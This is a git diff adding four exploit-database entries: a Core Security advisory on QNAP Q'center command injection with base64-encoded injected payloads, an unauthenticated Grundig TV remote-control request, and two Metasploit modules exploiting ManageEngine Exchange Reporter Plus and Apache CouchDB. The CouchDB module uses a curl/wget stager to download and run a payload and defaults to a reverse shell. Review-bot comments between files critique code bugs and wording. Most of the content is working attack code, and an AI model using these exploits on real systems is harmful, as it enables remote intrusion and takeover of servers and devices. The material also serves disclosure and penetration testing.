diff --git a/exploits/hardware/webapps/45015.txt b/exploits/hardware/webapps/45015.txt
new file mode 100644
index 000000000..49115f249
--- /dev/null
+++ b/exploits/hardware/webapps/45015.txt
@@ -0,0 +1,398 @@ +Core Security - Corelabs Advisory +http://corelabs.coresecurity.com/ + +QNAP Qcenter Virtual Appliance Multiple Vulnerabilities + +1. *Advisory Information* + +Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities +Advisory ID: CORE-2018-0006 +Advisory URL: +http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities +Date published: 2018-07-11 +Date of last update: 2018-07-11 +Vendors contacted: QNAP +Release mode: Coordinated release + +2. *Vulnerability Information* + +Class: Information Exposure [CWE-200], Command Injection [CWE-77], +Command Injection [CWE-77], Command Injection [CWE-77], +Command Injection [CWE-77] +Impact: Code execution +Remotely Exploitable: Yes +Locally Exploitable: Yes +CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709, +CVE-2018-0710 + +3. *Vulnerability Description* + +QNAP's website states that: + +[1] Q'center Virtual Appliance is a central management platform that +enables you to consolidate the management of multiple QNAP NAS. The +Q'center web interface gives you the ease-of-use, cost-efficiency, +convenience and flexibility to manage multiple NAS, across multiple +sites, from any internet browser. + +The platform's provides centralized web-based administration to manage +the following features: + +- Review HDD S.M.A.R.T. values +- Monitor system status +- Manage apps and shared folders +- Review infographice reports + +Multiple vulnerabilities were found in the Q'center Virtual Appliance +web console that would allow an attacker to execute arbitrary commands +on the system. + +4. *Vulnerable versions* + +. Q'center Virtual Appliance Version 1.6.1056 (20170825) +. Q'center Virtual Appliance Version 1.6.1075 (20171123) +Other products and versions might be affected, but they were not tested. + +5. *Vendor Information, Solutions and Workarounds* + +QNAP published the following Security Note: + +. https://www.qnap.com/en-us/security-advisory/nas-201807-10 + +6. 
*Credits* + +These vulnerabilities were discovered and researched by Ivan Huertas +from Core Security Consulting Services. The publication of this advisory +was coordinated by Leandro Cuozzo from Core Advisories Team. + +7. *Technical Description / Proof of Concept Code* + +QNAP's Q'center Virtual Appliance web console includes a functionality +that would allow an authenticated attacker to elevate privileges on the +system. We describe this issue in section 7.1. + +Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command +execution. + +7.1. *Privilege escalation* + +[CVE-2018-0706] +The application contains an API endpoint that returns information about +the accounts defined in the database. The information returned is +informative for all the users except for the admin user, which cames +with every installation, where an extra field is presented. This extra +field (new_password) contains the password defined at installation time +for the admin user encoded in base64. + +Any authenticated user could access this API endpoint and retrieve the +admin user's password, therefore being able to login as an administrator. + +The following proof of concept shows a user with viewer access +retrieving the admin's password encoded in base64 in the new_password +field. 
+ +/----- +GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1 +Host: 192.168.1.178 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.178/qcenter/ +Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; +DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432; +_ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false +Connection: close + +HTTP/1.1 200 OK +Date: Thu, 01 Mar 2018 19:23:43 GMT +Server: Apache +X-Frame-Options: SAMEORIGIN +X-XSS-Protection: 1; mode=block +X-Content-Type-Options: nosniff +Content-Type: application/json +Content-Length: 878 +Connection: close + +{ +"total_count": 2, +"account": [ +{ +"dst_enable": false, +"name": "admin", +"default": true, +"new_password": "YWRtaW5pc3RyYWRvcg==", +"authentication": 0, +"create_time": { +"$date": 1519917983616 +}, +"role": 4294967295, +"timezone_code": 17, +"last_login": { +"$date": 1519929869797 +}, +"_id": "5a981b9f3af7e2030c883592", +"email": "", +"description": "administrator" +}, +{ +"dst_enable": false, +"name": "viewer", +"register_code": "", +"authentication": 0, +"create_time": { +"$date": 1519929122332 +}, +"role": 1082130432, +"timezone_code": 17, +"last_login": { +"$date": 1519932215818 +}, +"_id": "5a9847223af7e2034924e7b6", +"email": "", +"description": "" +} +] +} +-----/ + +As can be seen in the following excerpt, the decoded base64 data +corresponds to the plaintext administrator password set at installation +time. + +/----- +$ echo YWRtaW5pc3RyYWRvcg== | base64 -d +administrador +-----/ + +7.2. *Command Execution in change password for the admin user* + +[CVE-2018-0707] +When the admin user performs a password change, the application executes +an OS command to impact the changes. 
The input is not properly sanitized +when passed down to the OS, allowing an attacker to run arbitrary +commands. + +/----- +POST /qcenter/hawkeye/v1/account?change_passwd HTTP/1.1 +Host: 192.168.1.209 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.209/qcenter/ +Content-Length: 118 +Cookie: CMS_lang=ENG; user=admin; CMS_SID=TWYH7A55X5; ROLE=4294967295; +_ID=5a8465ba3af7e2030984c84e; LOGIN_TIME=1518714672547; +AUTHENTICATION=0; TIMEZONE_CODE=17; DST_ENABLE=False; remember=false +Connection: close + +{"_id":"5a8465ba3af7e2030984c84e","old_password":"dGlzMzhhZWw=","new_password":"Ijt0b3VjaCAvdG1wL2NoYW5nZXBhc3M7Ig=="} +-----/ + +The API requires to send the password encoded in base64. This makes a +lot easier to inject command as we do not need to bypass any filters. +For the admin user in the web application, there is also a backing user +present on the OS. When a password change is requested for this user, +the values submitted to the API are included in a "sudo passwd" command, +where the injection occurs. + +In this particular case, the old_password must match the current +password, which can be obtained by exploiting [CVE-2018-0706]. + +7.3. *Command Execution in network config update* + +[CVE-2018-0708] +The admin user created at installation time can modify the network +configuration. In order to do this, the admin has to access the settings +section which is protected by the OS password (which could be obtained +using the Privilege Escalation vulnerability described above). However, +we identified that a user with the Power User profile could also execute +this function, despite access not being provided through the web +application interface. 
This function requires to send the admin user +password encoded in base64 in the passwd field. This value is then used +to perform a sudo operation in the OS to change the network settings. We +used the passwd field to inject command +(";touch /tmp/netconfigpower; echo "a) and create a file in /tmp/. + +/----- +POST /qcenter/hawkeye/v1/network_config HTTP/1.1 +Host: 192.168.1.178 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.178/qcenter/ +Content-Length: 87 +Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; +DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735; +_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false +Connection: close + +{"type":"0","dns_type":"0","passwd":"Ijt0b3VjaCAvdG1wL25ldGNvbmZpZ3Bvd2VyOyBlY2hvICJh"} +-----/ + +The passwd parameter is used in bash echo command unsanitized. + +7.4. *Command Execution in date config update* + +[CVE-2018-0709] +The admin user created at installation time is capable of modifying the +date configuration. In order to do this, the admin has to access the +settings section which is protected by the OS password (which could be +obtained using the Privilege Escalation vulnerability described above). +However, we identified that a user with the Power User profile could +execute this function, despite the access is not provided through the +web application interface. This function requires to submit the admin +user password encoded in base64 in the passwd field. This value is then +used to perform a sudo operation in the OS to change the date +configuration settings. We used the passwd field to inject command +(";touch /tmp/date_config;echo"lalala) and create a file in /tmp/. 
+ +/----- +POST /qcenter/hawkeye/v1/date_config HTTP/1.1 +Host: 192.168.1.178 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.178/qcenter/ +Content-Length: 153 +Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; +DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735; +_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false +Connection: close + +{"listValue":18,"type":"1","datefield":1518663600000,"passwd":"Ijt0b3VjaCAvdG1wL2RhdGVfY29uZmlnO2VjaG8ibGFsYWxh","date":"20180215","time":"16:40:31"} +-----/ + +The passwd parameter is used in bash echo command unsanitized. + +7.5. *Command Execution in SSH settings config update* +[CVE-2018-0710] +The admin user created at installation time is capable of modifying the +SSH configuration. In order to do this, the admin has to access the +settings section which is protected by the OS password (which could be +obtained using the Privilege Escalation vulnerability). However, we +identified that a user with the Power User profile could execute this +function, despite the access is not provided through the web application +interface. This function requires to submit the admin user password +encoded in base64 in the passwd field. This value is then used to +perform a sudo operation in the OS to change the date configuration +settings. We used the passwd field to inject command +("";touch /tmp/ssh; echo "lalalala) and create a file in /tmp/. 
+ +/----- +POST /qcenter/hawkeye/v1/ssh_setting_config HTTP/1.1 +Host: 192.168.1.178 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Referer: https://192.168.1.178/qcenter/ +Content-Length: 82 +Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; +DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735; +_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false +Connection: close + +{"ssh_enable":1,"port":22,"passwd":"Ijt0b3VjaCAvdG1wL3NzaDsgZWNobyAibGFsYWxhbGE="} +-----/ + +The passwd parameter is used in bash echo command unsanitized. + +8. *Report Timeline* +2018-03-13: Core Security sent an initial notification to QNAP, +including a draft advisory. +2018-03-14: QNAP replied that they received the draft version of the +advisory and that they would review it. +2018-03-23: Core Security requested a status update. +2018-04-10: Core Security requested a confirmation about the reported +vulnerabilities and a tentative timescale to fix them. +2018-04-12: QNAP answered saying that they were unable to reproduce the +reported vulnerabilities and asked for more detailed information to +reproduce them. +2018-04-13: Core Security sent a more detailed guide to test. +2018-04-16: QNAP confirmed reception. +2018-04-26: Core Security requested a status update. +2018-04-29: QNAP confirmed the reported vulnerabilities and informed +that their software team were working in a fixed version. +2018-05-21: Core Security requested a status update. +2018-05-28: QNAP informed that a new version of Q'center would be +release by the week of June 4. +2018-05-28: Core Security thanked for the update and proposed June 13th +as publication date. 
+2018-05-29: QNAP answered saying that the new Q'center release was +delayed and asked to postpone the publication a week later. +2018-05-29: Core Security asked for a solidified release date in order +to go public at the same time. +2018-06-04: QNAP informed that they didn't have a confirmed date yet. +2018-06-08: Core Security asked QNAP for a status update. +2018-06-12: QNAP notified that Q'center was under testing, for that +reason they didn't have a confirmed release date. +2018-06-25: Core Security asked again for a status update. +2018-06-27: QNAP replied that they were expecting to release their +security advisory next week Thursday or Friday. +2018-06-28: Core Security informed QNAP that recommend vendors not to +publish near the weekend and proposed Wednesday July 11th as the +publication date. +2018-07-02: Core Security asked for a confirmation about the proposed +date. +2018-06-27: QNAP confirmed July 11th as the publication date. +2018-07-11: Advisory CORE-2018-0006 published. + +9. *References* + +[1] https://www.qnap.com/solution/qcenter/index.php + +10. *About CoreLabs* + +CoreLabs, the research center of Core Security, is charged with +anticipating the future needs and requirements for information security +technologies. +We conduct our research in several important areas of computer security +including system vulnerabilities, cyber attack planning and simulation, +source code auditing, and cryptography. Our results include problem +formalization, identification of vulnerabilities, novel solutions and +prototypes for new technologies. CoreLabs regularly publishes security +advisories, technical papers, project information and shared software +tools for public use at: +http://corelabs.coresecurity.com. + +11. *About Core Security* + +Core Security provides companies with the security insight they need to +know who, how, and what is vulnerable in their organization. 
The +company's threat-aware, identity & access, network security, and +vulnerability management solutions provide actionable insight and +context needed to manage security risks across the enterprise. This +shared insight gives customers a comprehensive view of their security +posture to make better security remediation decisions. Better insight +allows organizations to prioritize their efforts to protect critical +assets, take action sooner to mitigate access risk, and react faster if +a breach does occur. + +Core Security is headquartered in the USA with offices and operations in +South America, Europe, Middle East and Asia. To learn more, contact Core +Security at (678) 304-4500 or info@coresecurity.com + +12. *Disclaimer* + +The contents of this advisory are copyright (c) 2018 Core Security and +(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution +Non-Commercial Share-Alike 3.0 (United States) License: +http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \ No newline at end of file diff --git a/exploits/hardware/webapps/45022.txt b/exploits/hardware/webapps/45022.txt new file mode 100644 index 000000000..a4a61ac66 --- /dev/null +++ b/exploits/hardware/webapps/45022.txt 
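Review bot: Section 7.5 covers the ssh_setting_config endpoint, yet its explanatory paragraph still says the passwd value is used "to perform a sudo operation in the OS to change the date configuration settings", a copy-paste remnant from 7.4; it should read `perform a sudo operation in the OS to change the SSH configuration settings`. The Report Timeline lists `2018-06-27: QNAP confirmed July 11th as the publication date.` between the 2018-07-02 and 2018-07-11 entries, which reads as a mistyped early-July date and should be confirmed against the original correspondence rather than left out of order. In section 2 the Class line repeats "Command Injection [CWE-77]" four times without tying each entry to a CVE; pairing each class with its identifier would make the mapping to sections 7.2–7.5 unambiguous. The four injection findings share one root cause the text states but never summarises — a base64-decoded request field is interpolated unescaped into a sudo shell command — and a one-line remediation note to that effect (pass the value as a discrete argument and validate it, rather than filtering characters) would help readers who only skim section 5.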
@@ -0,0 +1,34 @@
+# Exploit Title: Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
+# Date: 2018-07-§3
+# Exploit Author: Ahmethan-Gultekin - t4rkd3vilz
+# Vendor Homepage: https://www.grundig.com/
+# Software Link: https://play.google.com/store/apps/details?id=arcelik
+# Version: Before > Smart Inter@ctive 3.0
+# Tested on: Kali Linux
+# CVE : CVE-2018-13989
+
+# I'm trying my TV.I saw a Grundig remote control application on
+# Google Play. Computer I downloaded and decompiled APK.
+# And I began to examine individual classes. I noticed in a class
+# that a request was sent during operations on the command line.
+# I downloaded the phone packet viewer and opened the control application and
+# made some operations. And I saw that there was such a request;
+
+# PoC
+
+request ->
+GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1
+Host: 192.168.1.106:8085
+Connection : Keep-Alive
+User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
+
+
+response ->
+HTTP/1.1 200 OK
+Content-Type : text/plain
+
+# Set rc key is handled for key id : -2544 key symbol : -4081
+# The only requirement for the connection between the TV and the application
+# was to have the same IP address. After I made the IP address on the TV
+# and the phone and the IP address on the computer the same:
+# I accessed the interface from the 8085 port. Now I could do anything from the computer :)
\ No newline at end of file
diff --git a/exploits/java/remote/45018.rb b/exploits/java/remote/45018.rb
new file mode 100755
index 000000000..2bd65b0d9
--- /dev/null
+++ b/exploits/java/remote/45018.rb
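Review bot: The header line `# Date: 2018-07-§3` carries a mis-encoded character where the day digit should be; the value is not recoverable from the text and should be restored from the original submission. The PoC shows a plain GET to `/sendrcpackage` on port 8085 answered with 200 and no session, token or credential anywhere in the exchange, so while the title names the cross-site trigger, the weakness the page actually demonstrates is a control interface that accepts commands from any host on the LAN without authentication — that is the fact a mitigation note (restrict the listener, require pairing/authentication) should lead with. The closing paragraph's "same IP address" presumably means the same network/subnet, since two hosts cannot share the TV's address; rewording it as `on the same network` would avoid confusing readers.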
@@ -0,0 +1,91 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE', + 'Description' => %q{ + This module exploits a remote code execution vulnerability that + exists in Exchange Reporter Plus <= 5310, caused by execution of + bcp.exe file inside ADSHACluster servlet + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Kacper Szurek ' + ], + 'References' => + [ + ['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html'] + ], + 'Platform' => ['win'], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [['Automatic', {}]], + 'DisclosureDate' => 'Jun 28 2018', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'The URI of the application', '/']), + Opt::RPORT(8181), + ]) + + end + + def bin_to_hex(s) + s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join + end + + def check + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion') + }) + + unless res + vprint_error 'Connection failed' + return CheckCode::Safe + end + + unless res.code == 200 + vprint_status 'Target is not Manage Engine Exchange Reporter Plus' + return CheckCode::Safe + end + + begin + json = res.get_json_document + raise if json.empty? 
|| !json['BUILD_NUMBER'] + rescue + vprint_status 'Target is not Manage Engine Exchange Reporter Plus' + return CheckCode::Safe + end + + vprint_status "Version: #{json['BUILD_NUMBER']}" + + if json['BUILD_NUMBER'].to_i <= 5310 + return CheckCode::Appears + end + + CheckCode::Safe + end + + def exploit + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'), + 'vars_post' => { + 'MTCALL' => "nativeClient", + 'BCP_RLL' => "0102", + 'BCP_EXE' => bin_to_hex(generate_payload_exe) + } + }) + end +end \ No newline at end of file diff --git a/exploits/linux/remote/45019.rb b/exploits/linux/remote/45019.rb new file mode 100755 index 000000000..fc377e96d --- /dev/null +++ b/exploits/linux/remote/45019.rb 
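Review bot: In `check`, `if json['BUILD_NUMBER'].to_i <= 5310` reports `CheckCode::Appears` for any target whose BUILD_NUMBER is a non-numeric string, because `String#to_i` returns 0 for such input; converting with `build = Integer(json['BUILD_NUMBER'], exception: false)` and returning `CheckCode::Detected` when `build` is nil would keep the version test from producing a false positive. `exploit` assigns `res` from `send_request_cgi` but never reads it, so a nil response (connection dropped) is indistinguishable from success in the module output; either drop the assignment or report the response status to the user. The `%q{...}` description says "Exchange Reporter Plus <= 5310", which matches the comparison, but a one-line comment on the `5310` literal naming it as the last affected build would make the constant self-explanatory.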
@@ -0,0 +1,317 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache CouchDB Arbitrary Command Execution', + 'Description' => %q{ + CouchDB administrative users can configure the database server via HTTP(S). + Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. + This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, + including downloading and executing scripts from the public internet. + }, + 'Author' => [ + 'Max Justicz', # CVE-2017-12635 Vulnerability discovery + 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery + 'Green-m ' # Metasploit module + ], + 'References' => [ + ['CVE', '2017-12636'], + ['CVE', '2017-12635'], + ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'], + ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'], + ['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E'] + ], + 'DisclosureDate' => 'Apr 6 2016', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Privileged' => false, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x64/shell_reverse_tcp', + 'CMDSTAGER::FLAVOR' => 'curl' + }, + 'CmdStagerFlavor' => ['curl', 'wget'], + 'Targets' => [ + ['Automatic', {}], + ['Apache CouchDB version 1.x', {}], + ['Apache CouchDB version 2.x', {}] + ], + 'DefaultTarget' => 0 + )) + + register_options([ + Opt::RPORT(5984), + OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and 
execute. (default is random)']), + OptString.new('HttpUsername', [false, 'The username to login as']), + OptString.new('HttpPassword', [false, 'The password to login with']) + ]) + + register_advanced_options([ + OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']), + OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp']) + ]) + end + + def check + get_version + version = Gem::Version.new(@version) + return CheckCode::Unknown if version.version.empty? + vprint_status "Found CouchDB version #{version}" + + return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) + + CheckCode::Safe + end + + def exploit + fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version + version = @version + + vprint_good("#{peer} - Authorization bypass successful") if auth_bypass + + print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager") + @cmdstager = generate_cmdstager( + temp: datastore['WritableDir'], + file: File.basename(cmdstager_path) + ).join(';') + + register_file_for_cleanup(cmdstager_path) + + if !datastore['Attempts'] || datastore['Attempts'] <= 0 + attempts = 1 + else + attempts = datastore['Attempts'] + end + + attempts.times do |i| + print_status("#{peer} - The #{i + 1} time to exploit") + send_payload(version) + Rex.sleep(5) + # break if we get the shell + break if session_created? + end + end + + # CVE-2017-12635 + # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, + # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization + # for the newly created user. 
+ def auth_bypass + username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12) + password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12) + @auth = basic_auth(username, password) + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"), + 'method' => 'PUT', + 'ctype' => 'application/json', + 'data' => %({"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"}) + ) + + if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok'] + return true + else + return false + end + end + + def get_version + @version = nil + + begin + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + 'authorization' => @auth + ) + rescue Rex::ConnectionError + vprint_bad("#{peer} - Connection failed") + return false + end + + unless res + vprint_bad("#{peer} - No response, check if it is CouchDB. ") + return false + end + + if res && res.code == 401 + print_bad("#{peer} - Authentication required.") + return false + end + + if res && res.code == 200 + res_json = res.get_json_document + + if res_json.empty? + vprint_bad("#{peer} - Cannot parse the response, seems like it's not CouchDB.") + return false + end + + @version = res_json['version'] if res_json['version'] + return true + end + + vprint_warning("#{peer} - Version not found") + return true + end + + def send_payload(version) + vprint_status("#{peer} - CouchDB version is #{version}") if version + + version = Gem::Version.new(@version) + if version.version.empty? + vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.") + # if target set Automatic, exploit failed. 
+ if target == targets[0] + fail_with(Failure::NoTarget, "#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.") + elsif target == targets[1] + payload1 + elsif target == targets[2] + payload2 + end + elsif version < Gem::Version.new('1.7.0') + payload1 + elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) + payload2 + elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0') + fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.") + end + end + + # Exploit with multi requests + # payload1 is for the version of couchdb below 1.7.0 + def payload1 + rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) + rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) + rand_db = Rex::Text.rand_text_alpha_lower(4..12) + rand_doc = Rex::Text.rand_text_alpha_lower(4..12) + rand_hex = Rex::Text.rand_text_hex(32) + rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}" + + register_file_for_cleanup(rand_file) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %("echo '#{@cmdstager}' > #{rand_file}") + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}"), + 'method' => 'PUT', + 'authorization' => @auth + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %({"_id": "#{rand_hex}"}) + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"), + 'method' => 'POST', + 'authorization' => @auth, + 'ctype' => 'application/json', + 'data' => %({"language":"#{rand_cmd1}","map":""}) + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %("/bin/sh #{rand_file}") + ) + + 
send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"), + 'method' => 'POST', + 'authorization' => @auth, + 'ctype' => 'application/json', + 'data' => %({"language":"#{rand_cmd2}","map":""}) + ) + end + + # payload2 is for the version of couchdb below 2.1.1 + def payload2 + rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) + rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) + rand_db = Rex::Text.rand_text_alpha_lower(4..12) + rand_doc = Rex::Text.rand_text_alpha_lower(4..12) + rand_tmp = Rex::Text.rand_text_alpha_lower(4..12) + rand_hex = Rex::Text.rand_text_hex(32) + rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}" + + register_file_for_cleanup(rand_file) + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_membership"), + 'method' => 'GET', + 'authorization' => @auth + ) + + node = res.get_json_document['all_nodes'][0] + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %("echo '#{@cmdstager}' > #{rand_file}") + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}"), + 'method' => 'PUT', + 'authorization' => @auth + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %({"_id": "#{rand_hex}"}) + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'ctype' => 'application/json', + 'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"}) + ) + + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'data' => %("/bin/sh #{rand_file}") + ) + + send_request_cgi( + 'uri' 
=> normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"), + 'method' => 'PUT', + 'authorization' => @auth, + 'ctype' => 'application/json', + 'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"}) + ) + end + + def cmdstager_path + @cmdstager_path ||= + "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}" + end + +end \ No newline at end of file diff --git a/exploits/linux/remote/45025.rb b/exploits/linux/remote/45025.rb new file mode 100755 index 000000000..e90d4ae66 --- /dev/null +++ b/exploits/linux/remote/45025.rb 
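Review bot: In `send_payload`, `elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')` is not a range test: the right-hand operand is a bare `Gem::Version` object, which is always truthy, so the branch is taken for every version the preceding branches rejected regardless of the comparison. Because `< 1.7.0` and `between?('2.0.0', '2.1.0')` are already handled above it, the honest form is a plain `else` with `fail_with(Failure::NotVulnerable, ...)`, which also documents that 1.7.x and 2.1.1+ are the non-vulnerable set. `payload2` calls `res.get_json_document['all_nodes'][0]` without checking that `res` is non-nil or that `all_nodes` is present, so a closed connection surfaces as a NoMethodError instead of the `fail_with` style the rest of the module uses. `check` treats exactly `2.1.0` as affected via the inclusive `between?`, which agrees with the description's "before 2.1.1"; a short comment stating that the upper bound is inclusive would save the next reader from re-deriving it.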
